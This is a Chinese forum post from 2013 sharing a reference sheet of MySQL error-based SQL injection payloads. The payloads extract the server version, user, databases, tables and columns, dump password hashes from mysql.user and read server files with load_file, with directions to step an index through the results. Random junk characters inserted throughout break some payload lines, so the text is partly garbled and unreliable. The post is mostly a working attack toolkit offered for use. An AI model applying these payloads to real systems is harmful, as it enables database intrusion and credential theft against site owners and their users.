Mysql暴错注入参考（pdf）

admin

本帖最后由 Nightmare 于 2013-3-17 14:20 编辑

3 f3 N2 V/ o/ V8 a
2 z1 f/ O. n3 y1 nMysql暴错注入参考（pdf），每天一贴。。。

7 V! B& B% K+ O2 L8 k, U  j! DMySql Error Based Injection Reference
7 R6 o! g% W4 D" x! s. o0 ^[Mysql暴错注入参考]
2 P8 n8 E- q( ?. Z8 u; uAuthornig0s1992
* P& w1 w0 Q' t# rBlog:http://pnig0s1992.blog.51cto.com/
TeAm:http://www.FreeBuf.com/
Mysql5.0.91下测试通过,对于5+的绝大部分版本可以测试成功
- H& I! D8 C$ f4 j* w+ a9 _小部分版本使用name_const()时会报错.可以用给出的Method.2测试
/ Q5 R( w/ M0 K6 q" x; w' ~% h  A查询版本:
Method.1:and+exists(select*from+(select*from(select+name_const(@@version,0))a+
) [% M) q/ i) I& q- l$ ^; ujoin+(select+name_const(@@version,0))b)c)
5 _7 B; _. e$ z4 `Method.2:and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+gro
up by a)b)
查询当前用户:
/ m) J2 ?% r2 I+ M" `& T4 ^% QMethod.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)
Method.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(r
and(0)*2))x+from+information_schema.tables+group+by+x)a)
查询当前数据库:
Method.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)
$ e+ w, U% G: d9 n% GMethod.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).flo
& y# R" T+ i& T" d1 m1 ?or(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
4 D" w/ P: `4 x' a( m依次爆库and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+
LIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c) 将n
顺序替换
爆指定库数目:
+ C$ Y9 L9 Q/ N' q9 c( o, p& N: d& _and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+t
9 D2 }" v" h' N" a5 L, e* kable_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group
; x* P  P8 O2 L2 K. _. _+by+x)a)+and+1=1 0x6D7973716C=mysql
% G5 u( o/ K1 M: x! K' T$ h5 c依次爆表:
4 {! V+ o! ?( z! ]; oand+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+t
  G$ T) ]0 b* [able_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.ta
bles+group+by+x)a)+and+1=1
0x6D7973716C=Mysql 将n顺序替换
. f1 j4 K; u% j  G' O4 S' c# i8 k爆表内字段数目:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE
  z6 `) T& Y7 y4 J# T6 f1 r+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(ran
+ _) z5 r: t. r* i3 j3 O' ~; k0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
依次爆字段:
( |* r2 v& {+ A$ t* @and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where
& r2 k6 o: q$ Q& v+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1
6 s' E# w, ~/ l6 B0 A& h; s4 eloor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1  将n顺序替换
依次暴内容:
% B1 v& n# [: z5 e! f8 |( ]1 wand+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_sche
- k& D+ C: `/ {' K" ?" Ima.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
将n顺序替换
爆文件内容:
7 O1 J& ~6 b& Y/ Z/ Dand+(SELECT+1+FROM+(select count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a
from+information_schema.tables+group+by+a)b)
! I7 i7 w, ^2 q, U0x433A5C5C626F6F742E696E69=C:\\boot.ini 因为只能爆出64字节的内容,需要用Substring()控制显示的字节
8 }2 U4 Y# o& NThx for reading.
  ^+ X  ]9 B$ ?4 Z9 d1 y) ?) R
% Z' Y9 a9 ~( Q+ T3 J不要下载也可以，
: `% ?' f. {2 m6 a